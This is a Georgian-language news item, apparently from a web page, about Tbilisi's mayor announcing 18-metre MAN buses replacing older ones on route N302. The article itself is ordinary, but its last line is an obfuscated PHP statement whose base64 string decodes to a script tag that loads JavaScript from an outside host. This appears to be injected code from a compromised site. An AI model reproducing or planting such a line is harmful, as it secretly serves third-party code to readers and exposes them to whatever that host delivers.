celsiusi
ავერსი საქკაბელი

თბილისის მერი, კახა კალაძის ინფორმაციით, ძველი, 12-მეტრიანი ავტობუსები უკვე ჩანაცვლდნენ ახალი, 18-მეტრიანი ავტობუსებით N302 მარშრუტზე - ამის შესახებ მერმა დედაქალაქის მთავრობის სხდომაზე ისაუბრა. 

"დღეს დილიდან N302 მარშრუტზე MAN-ის მარკის 9 ერთეული 18-მეტრიანი ავტობუსი გავიდა. საზოგადოებამ იცის, რომ არასდროს ამირიდებია თავი ქალაქში არსებული პრობლემებისთვის. კარგად ვიცით, რომელ უბანს რა პრობლემები აქვს, რა გამოწვევების წინაშე დგანან და შემთხვევითი არ არის, რომ ეს კონკრეტული ავტობუსები დიდი დიღმის მარშრუტზე შევიყვანეთ, რაც ძალიან მნიშვნელოვანია.

დღეიდან, აღნიშნული ავტობუსები დიდი დიღმის დასახლებიდან სახელმწიფო უნივერსიტეტის, მაღლივი კორპუსის მიმართულებით იმოძრავებენ და ამ მარშრუტზე აქამდე მოძრავ 12-მეტრიან ავტობუსებს ჩაანაცვლებენ”, - განაცხადა დედაქალაქის მერმა.

162 მგზავრზე გათვლილი 18-მეტრიანი ავტობუსების თბილისის ქუჩებში ეტაპობრივად გამოჩნდებიან. როგორც ცნობილია, დედაქალაქის მერიამ უკვე შეიძინა 160 ერთეული 18-მეტრიანი ავტობუსი, საიდანაც 50 დეკემბრიდან უკვე საქართველოშია.

414
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");